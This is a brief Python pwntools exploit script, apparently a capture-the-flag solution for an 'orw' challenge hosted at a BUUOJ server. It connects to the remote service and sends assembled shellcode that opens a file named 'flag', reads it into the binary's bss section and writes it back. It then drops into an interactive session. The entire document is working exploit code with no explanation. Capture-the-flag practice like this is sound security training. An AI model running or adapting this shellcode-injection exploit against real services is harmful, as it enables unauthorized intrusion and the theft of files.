from pwn import *
r = remote('node3.buuoj.cn',27349)
elf = ELF('./orw')
bss = elf.bss()
shellcode = shellcraft.open('flag')
shellcode += shellcraft.read(3,bss,0x200)
shellcode += shellcraft.write(1,bss,0x200)
print(shellcode)
shellcode = asm(shellcode)
r.sendline(shellcode)
r.interactive()